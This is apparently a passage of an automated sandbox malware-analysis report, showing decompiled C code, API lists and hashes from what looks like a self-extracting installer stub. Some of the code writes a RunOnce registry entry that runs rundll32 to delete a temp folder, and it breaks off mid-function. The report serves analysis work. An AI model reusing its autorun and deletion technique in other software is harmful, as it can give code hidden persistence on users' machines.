                                                                                                                                                                                                      0x00e7435d
                                                                                                                                                                                                      0x00e7436e
                                                                                                                                                                                                      0x00e7436e
                                                                                                                                                                                                      0x00e7437d
                                                                                                                                                                                                      0x00e74383
                                                                                                                                                                                                      0x00e74387
                                                                                                                                                                                                      0x00e7438e
                                                                                                                                                                                                      0x00e7438e
                                                                                                                                                                                                      0x00e74387
                                                                                                                                                                                                      0x00e74391
                                                                                                                                                                                                      0x00e74399
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e74295
                                                                                                                                                                                                      0x00e7429f
                                                                                                                                                                                                      0x00e742a5
                                                                                                                                                                                                      0x00e742aa
                                                                                                                                                                                                      0x00e742aa
                                                                                                                                                                                                      0x00e742ad
                                                                                                                                                                                                      0x00e742ad
                                                                                                                                                                                                      0x00e742af
                                                                                                                                                                                                      0x00e742b0
                                                                                                                                                                                                      0x00e742b6
                                                                                                                                                                                                      0x00e742c2
                                                                                                                                                                                                      0x00e742c8
                                                                                                                                                                                                      0x00e742ce
                                                                                                                                                                                                      0x00e742e4
                                                                                                                                                                                                      0x00e742e4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e742ce

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00E74236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00E7424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00E74263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00E7427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00E788C0,?,00000001), ref: 00E7429F
                                                                                                                                                                                                      • CharPrevA.USER32(00E788C0,01CF1181,?,00000001), ref: 00E742C2
                                                                                                                                                                                                      • CharPrevA.USER32(00E788C0,00000000,?,00000001), ref: 00E742D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E74391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E743A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: b1e44e7ba60ccfe8e01c0a04c69cf42a0a393c91b4eb8f84587941676f7d2f0e
                                                                                                                                                                                                      • Instruction ID: 8593a1b6fa482520b467683007825b85868b64dbbafebdb1d1896391b1ba85c7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e44e7ba60ccfe8e01c0a04c69cf42a0a393c91b4eb8f84587941676f7d2f0e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 474128B4A40340AFE711DF75DC8C96E7BB4EB94348F4894A9E90DB3291CB748C45C762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E72773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E00E71781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E00E7658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E00E7658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0xe71140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E00E71680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      0x00e72773
                                                                                                                                                                                                      0x00e7277e
                                                                                                                                                                                                      0x00e72785
                                                                                                                                                                                                      0x00e7278a
                                                                                                                                                                                                      0x00e7278d
                                                                                                                                                                                                      0x00e72790
                                                                                                                                                                                                      0x00e72792
                                                                                                                                                                                                      0x00e72798
                                                                                                                                                                                                      0x00e7279d
                                                                                                                                                                                                      0x00e728b2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e727a3
                                                                                                                                                                                                      0x00e727a3
                                                                                                                                                                                                      0x00e727af
                                                                                                                                                                                                      0x00e727c2
                                                                                                                                                                                                      0x00e727c8
                                                                                                                                                                                                      0x00e727cd
                                                                                                                                                                                                      0x00e727d5
                                                                                                                                                                                                      0x00e728b7
                                                                                                                                                                                                      0x00e728b9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e727db
                                                                                                                                                                                                      0x00e727dd
                                                                                                                                                                                                      0x00e728aa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e727e3
                                                                                                                                                                                                      0x00e727e3
                                                                                                                                                                                                      0x00e727ec
                                                                                                                                                                                                      0x00e727f8
                                                                                                                                                                                                      0x00e72803
                                                                                                                                                                                                      0x00e7280b
                                                                                                                                                                                                      0x00e72831
                                                                                                                                                                                                      0x00e728c3
                                                                                                                                                                                                      0x00e728c9
                                                                                                                                                                                                      0x00e728cd
                                                                                                                                                                                                      0x00e72837
                                                                                                                                                                                                      0x00e7285a
                                                                                                                                                                                                      0x00e7285c
                                                                                                                                                                                                      0x00e72865
                                                                                                                                                                                                      0x00e72892
                                                                                                                                                                                                      0x00e72895
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72867
                                                                                                                                                                                                      0x00e72878
                                                                                                                                                                                                      0x00e7288c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7287a
                                                                                                                                                                                                      0x00e72880
                                                                                                                                                                                                      0x00e72885
                                                                                                                                                                                                      0x00e72897
                                                                                                                                                                                                      0x00e72899
                                                                                                                                                                                                      0x00e72899
                                                                                                                                                                                                      0x00e72878
                                                                                                                                                                                                      0x00e72865
                                                                                                                                                                                                      0x00e728a0
                                                                                                                                                                                                      0x00e728bf
                                                                                                                                                                                                      0x00e728c1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e728c1
                                                                                                                                                                                                      0x00e72831
                                                                                                                                                                                                      0x00e727dd
                                                                                                                                                                                                      0x00e727d5
                                                                                                                                                                                                      0x00e728e5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperA.USER32(D47724E2,00000000,00000000,00000000), ref: 00E727A8
                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 00E727B5
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00E727BC
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72829
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72852
                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72870
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E728A0
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00E728AA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E728B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00E727E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                      • Opcode ID: 3c37f5a89692bb9759b2e9af88fec26a6c3f9be1bc7cacff6c052758ad024d40
                                                                                                                                                                                                      • Instruction ID: 2062c439050c5090dc96841053a8d2f66e93bc6473246a183217cf073b0795c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c37f5a89692bb9759b2e9af88fec26a6c3f9be1bc7cacff6c052758ad024d40
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8941B470A00128AFEB289B65DC45AEE77BDEB55704F0484A9F64DF2100CB714EC59FA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                      			E00E72267() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t19 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                      				if( *0xe78530 != 0) {
                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      								E00E7658A( &_v268, 0x104, 0xe71140);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      							E00E7171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00e72272
                                                                                                                                                                                                      0x00e72277
                                                                                                                                                                                                      0x00e72279
                                                                                                                                                                                                      0x00e72283
                                                                                                                                                                                                      0x00e72289
                                                                                                                                                                                                      0x00e722ab
                                                                                                                                                                                                      0x00e722b1
                                                                                                                                                                                                      0x00e722c4
                                                                                                                                                                                                      0x00e722e0
                                                                                                                                                                                                      0x00e722e6
                                                                                                                                                                                                      0x00e722f5
                                                                                                                                                                                                      0x00e7230d
                                                                                                                                                                                                      0x00e7231c
                                                                                                                                                                                                      0x00e7231c
                                                                                                                                                                                                      0x00e72321
                                                                                                                                                                                                      0x00e7233a
                                                                                                                                                                                                      0x00e72342
                                                                                                                                                                                                      0x00e72348
                                                                                                                                                                                                      0x00e7234b
                                                                                                                                                                                                      0x00e7234c
                                                                                                                                                                                                      0x00e7234c
                                                                                                                                                                                                      0x00e7234e
                                                                                                                                                                                                      0x00e7234f
                                                                                                                                                                                                      0x00e7236e
                                                                                                                                                                                                      0x00e7236e
                                                                                                                                                                                                      0x00e7237a
                                                                                                                                                                                                      0x00e72380
                                                                                                                                                                                                      0x00e72380
                                                                                                                                                                                                      0x00e72381
                                                                                                                                                                                                      0x00e72381
                                                                                                                                                                                                      0x00e7238f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00E722A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00E722D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E722F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00E72305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00E7236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E7237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00E72299
                                                                                                                                                                                                      • wextract_cleanup0, xrefs: 00E7227C, 00E722CD, 00E72363
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00E7232D
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E72321
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                      • API String ID: 3027380567-2874043782
                                                                                                                                                                                                      • Opcode ID: 85b7923ef53e63275c98f3642ee0e00dd54fbff612b57c7f42d5d466cbb40d0a
                                                                                                                                                                                                      • Instruction ID: ed1c0b0fecbda0cd6c911d0af26827525c0f19c423af2f00352511d942163f24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85b7923ef53e63275c98f3642ee0e00dd54fbff612b57c7f42d5d466cbb40d0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131C571A002186BDB21DB61DC49FEE7B7CEF64704F0441E9B54DB6051EA70AF88CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E00E73100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0xe78590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0xe78590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E00E743D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xe78d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0xe788b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E00E730C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x00e73108
                                                                                                                                                                                                      0x00e7310b
                                                                                                                                                                                                      0x00e731b7
                                                                                                                                                                                                      0x00e731ca
                                                                                                                                                                                                      0x00e731d0
                                                                                                                                                                                                      0x00e731d0
                                                                                                                                                                                                      0x00e731da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e731da
                                                                                                                                                                                                      0x00e73111
                                                                                                                                                                                                      0x00e73114
                                                                                                                                                                                                      0x00e73136
                                                                                                                                                                                                      0x00e73136
                                                                                                                                                                                                      0x00e73138
                                                                                                                                                                                                      0x00e7313b
                                                                                                                                                                                                      0x00e73141
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73143
                                                                                                                                                                                                      0x00e73116
                                                                                                                                                                                                      0x00e7311b
                                                                                                                                                                                                      0x00e7314b
                                                                                                                                                                                                      0x00e73151
                                                                                                                                                                                                      0x00e73158
                                                                                                                                                                                                      0x00e7316a
                                                                                                                                                                                                      0x00e73176
                                                                                                                                                                                                      0x00e7317d
                                                                                                                                                                                                      0x00e7318b
                                                                                                                                                                                                      0x00e7319e
                                                                                                                                                                                                      0x00e731a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e731ad
                                                                                                                                                                                                      0x00e73120
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7312a
                                                                                                                                                                                                      0x00e73134
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73134
                                                                                                                                                                                                      0x00e7312c
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00E7313B
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E7314B
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 00E7316A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E73176
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00E7317D
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 00E73185
                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 00E73190
                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00E730C0), ref: 00E731A3
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00E731CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 3785188418-3940384054
                                                                                                                                                                                                      • Opcode ID: 6d748932ca2a1aa59a6513c2c039a54f26d50a4ca597eb1920da3936d8f2976b
                                                                                                                                                                                                      • Instruction ID: 2918507c4821d289fc578005f4babb286002a608dedf4a96f166dcc8f9237a32
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d748932ca2a1aa59a6513c2c039a54f26d50a4ca597eb1920da3936d8f2976b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E811D231246251BFEB50DF35EC0CB9E3B64EB86725F949220F85DB11E0DB708685E742
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E00E718A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0xe78128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
